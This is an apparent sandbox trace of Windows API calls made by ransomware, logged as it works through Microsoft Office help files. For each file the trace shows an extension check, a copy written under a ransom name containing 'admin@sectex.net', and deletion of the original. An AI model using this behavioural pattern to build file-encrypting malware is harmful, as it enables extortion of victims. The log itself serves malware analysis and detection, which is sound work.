	[0144.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61
	[0144.427] lstrlenW (lpString=".doc") returned 4
	[0144.427] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0144.427] lstrlenW (lpString=".docx") returned 5
	[0144.427] lstrcmpiW (lpString1=".docx", lpString2="V.HXS") returned -1
	[0144.427] lstrlenW (lpString=".pdf") returned 4
	[0144.427] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0144.427] lstrlenW (lpString=".xls") returned 4
	[0144.427] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0144.427] lstrlenW (lpString=".xlsx") returned 5
	[0144.427] lstrcmpiW (lpString1=".xlsx", lpString2="V.HXS") returned -1
	[0144.427] lstrlenW (lpString=".ppt") returned 4
	[0144.427] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0144.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61
	[0144.427] lstrlenW (lpString=".zip") returned 4
	[0144.428] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0144.428] lstrlenW (lpString=".rar") returned 4
	[0144.428] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0144.428] lstrlenW (lpString=".bz2") returned 4
	[0144.428] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0144.428] lstrlenW (lpString=".7z") returned 3
	[0144.428] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0144.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61
	[0144.428] lstrlenW (lpString=".dbf") returned 4
	[0144.428] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0144.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61
	[0144.428] lstrlenW (lpString=".1cd") returned 4
	[0144.428] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0144.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61
	[0144.428] lstrlenW (lpString=".jpg") returned 4
	[0144.428] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0144.428] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0144.428] lstrlenW (lpString="EXCEL.DEV_COL.HXC") returned 17
	[0144.428] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.429] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=641) returned 1
	[0144.429] CloseHandle (hObject=0x384) returned 1
	[0144.429] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxc")) returned 0x20
	[0144.429] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.430] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.430] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0144.430] GetLastError () returned 0x0
	[0144.430] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x281, lpOverlapped=0x0) returned 1
	[0144.432] WriteFile (in: hFile=0x3cc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x290, lpOverlapped=0x0) returned 1
	[0144.433] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.433] WriteFile (in: hFile=0x3cc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0144.433] SetEndOfFile (hFile=0x3cc) returned 1
	[0144.433] CloseHandle (hObject=0x3cc) returned 1
	[0144.433] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.433] SetEndOfFile (hFile=0x384) returned 1
	[0144.436] CloseHandle (hObject=0x384) returned 1
	[0144.436] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.436] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxc")) returned 1
	[0144.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65
	[0144.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65
	[0144.438] lstrlenW (lpString=".doc") returned 4
	[0144.438] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0144.438] lstrlenW (lpString=".docx") returned 5
	[0144.438] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0144.438] lstrlenW (lpString=".pdf") returned 4
	[0144.438] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0144.438] lstrlenW (lpString=".xls") returned 4
	[0144.438] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0144.438] lstrlenW (lpString=".xlsx") returned 5
	[0144.438] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0144.438] lstrlenW (lpString=".ppt") returned 4
	[0144.439] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0144.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65
	[0144.439] lstrlenW (lpString=".zip") returned 4
	[0144.439] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0144.439] lstrlenW (lpString=".rar") returned 4
	[0144.439] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0144.439] lstrlenW (lpString=".bz2") returned 4
	[0144.439] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0144.439] lstrlenW (lpString=".7z") returned 3
	[0144.439] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0144.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65
	[0144.439] lstrlenW (lpString=".dbf") returned 4
	[0144.439] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0144.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65
	[0144.439] lstrlenW (lpString=".1cd") returned 4
	[0144.439] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0144.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65
	[0144.439] lstrlenW (lpString=".jpg") returned 4
	[0144.439] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0144.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65
	[0144.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65
	[0144.439] lstrlenW (lpString=".doc") returned 4
	[0144.439] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0144.439] lstrlenW (lpString=".docx") returned 5
	[0144.439] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0144.439] lstrlenW (lpString=".pdf") returned 4
	[0144.439] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0144.439] lstrlenW (lpString=".xls") returned 4
	[0144.439] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0144.439] lstrlenW (lpString=".xlsx") returned 5
	[0144.439] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0144.439] lstrlenW (lpString=".ppt") returned 4
	[0144.440] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0144.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65
	[0144.440] lstrlenW (lpString=".zip") returned 4
	[0144.440] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0144.440] lstrlenW (lpString=".rar") returned 4
	[0144.440] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0144.440] lstrlenW (lpString=".bz2") returned 4
	[0144.440] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0144.440] lstrlenW (lpString=".7z") returned 3
	[0144.440] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0144.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65
	[0144.440] lstrlenW (lpString=".dbf") returned 4
	[0144.440] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0144.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65
	[0144.440] lstrlenW (lpString=".1cd") returned 4
	[0144.440] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0144.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC") returned 65
	[0144.440] lstrlenW (lpString=".jpg") returned 4
	[0144.440] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0144.440] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0144.440] lstrlenW (lpString="EXCEL.DEV_COL.HXT") returned 17
	[0144.440] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.441] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=209) returned 1
	[0144.441] CloseHandle (hObject=0x384) returned 1
	[0144.441] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxt")) returned 0x20
	[0144.441] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.441] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.441] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.441] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.441] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0144.442] GetLastError () returned 0x0
	[0144.442] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xd1, lpOverlapped=0x0) returned 1
	[0144.443] WriteFile (in: hFile=0x3cc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0144.444] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.444] WriteFile (in: hFile=0x3cc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0144.444] SetEndOfFile (hFile=0x3cc) returned 1
	[0144.444] CloseHandle (hObject=0x3cc) returned 1
	[0144.444] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.444] SetEndOfFile (hFile=0x384) returned 1
	[0144.447] CloseHandle (hObject=0x384) returned 1
	[0144.447] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.447] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxt")) returned 1
	[0144.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65
	[0144.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65
	[0144.448] lstrlenW (lpString=".doc") returned 4
	[0144.448] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0144.448] lstrlenW (lpString=".docx") returned 5
	[0144.448] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0144.448] lstrlenW (lpString=".pdf") returned 4
	[0144.448] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0144.448] lstrlenW (lpString=".xls") returned 4
	[0144.448] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0144.448] lstrlenW (lpString=".xlsx") returned 5
	[0144.448] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0144.448] lstrlenW (lpString=".ppt") returned 4
	[0144.448] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0144.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65
	[0144.448] lstrlenW (lpString=".zip") returned 4
	[0144.448] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0144.448] lstrlenW (lpString=".rar") returned 4
	[0144.448] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0144.448] lstrlenW (lpString=".bz2") returned 4
	[0144.448] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0144.448] lstrlenW (lpString=".7z") returned 3
	[0144.448] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0144.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65
	[0144.448] lstrlenW (lpString=".dbf") returned 4
	[0144.448] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0144.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65
	[0144.448] lstrlenW (lpString=".1cd") returned 4
	[0144.448] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0144.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65
	[0144.449] lstrlenW (lpString=".jpg") returned 4
	[0144.449] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0144.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65
	[0144.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65
	[0144.449] lstrlenW (lpString=".doc") returned 4
	[0144.449] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0144.449] lstrlenW (lpString=".docx") returned 5
	[0144.449] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0144.449] lstrlenW (lpString=".pdf") returned 4
	[0144.449] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0144.449] lstrlenW (lpString=".xls") returned 4
	[0144.449] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0144.449] lstrlenW (lpString=".xlsx") returned 5
	[0144.449] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0144.449] lstrlenW (lpString=".ppt") returned 4
	[0144.449] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0144.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65
	[0144.449] lstrlenW (lpString=".zip") returned 4
	[0144.449] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0144.449] lstrlenW (lpString=".rar") returned 4
	[0144.449] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0144.449] lstrlenW (lpString=".bz2") returned 4
	[0144.449] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0144.449] lstrlenW (lpString=".7z") returned 3
	[0144.449] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0144.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65
	[0144.449] lstrlenW (lpString=".dbf") returned 4
	[0144.449] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0144.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65
	[0144.449] lstrlenW (lpString=".1cd") returned 4
	[0144.449] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0144.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65
	[0144.449] lstrlenW (lpString=".jpg") returned 4
	[0144.450] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0144.450] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0144.450] lstrlenW (lpString="EXCEL.DEV_F_COL.HXK") returned 19
	[0144.450] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.450] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=114) returned 1
	[0144.450] CloseHandle (hObject=0x384) returned 1
	[0144.450] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_f_col.hxk")) returned 0x20
	[0144.450] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.451] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.451] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.451] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.451] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0144.451] GetLastError () returned 0x0
	[0144.451] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x72, lpOverlapped=0x0) returned 1
	[0144.452] WriteFile (in: hFile=0x3cc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x80, lpOverlapped=0x0) returned 1
	[0144.453] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.453] WriteFile (in: hFile=0x3cc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0144.453] SetEndOfFile (hFile=0x3cc) returned 1
	[0144.453] CloseHandle (hObject=0x3cc) returned 1
	[0144.454] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.454] SetEndOfFile (hFile=0x384) returned 1
	[0144.456] CloseHandle (hObject=0x384) returned 1
	[0144.456] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.456] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_f_col.hxk")) returned 1
	[0144.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67
	[0144.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67
	[0144.457] lstrlenW (lpString=".doc") returned 4
	[0144.457] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0144.457] lstrlenW (lpString=".docx") returned 5
	[0144.457] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0144.457] lstrlenW (lpString=".pdf") returned 4
	[0144.457] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0144.457] lstrlenW (lpString=".xls") returned 4
	[0144.457] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0144.457] lstrlenW (lpString=".xlsx") returned 5
	[0144.457] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0144.457] lstrlenW (lpString=".ppt") returned 4
	[0144.457] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0144.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67
	[0144.457] lstrlenW (lpString=".zip") returned 4
	[0144.457] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0144.457] lstrlenW (lpString=".rar") returned 4
	[0144.457] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0144.457] lstrlenW (lpString=".bz2") returned 4
	[0144.457] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0144.457] lstrlenW (lpString=".7z") returned 3
	[0144.457] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0144.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67
	[0144.457] lstrlenW (lpString=".dbf") returned 4
	[0144.457] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0144.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67
	[0144.457] lstrlenW (lpString=".1cd") returned 4
	[0144.458] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0144.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67
	[0144.458] lstrlenW (lpString=".jpg") returned 4
	[0144.458] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0144.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67
	[0144.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67
	[0144.458] lstrlenW (lpString=".doc") returned 4
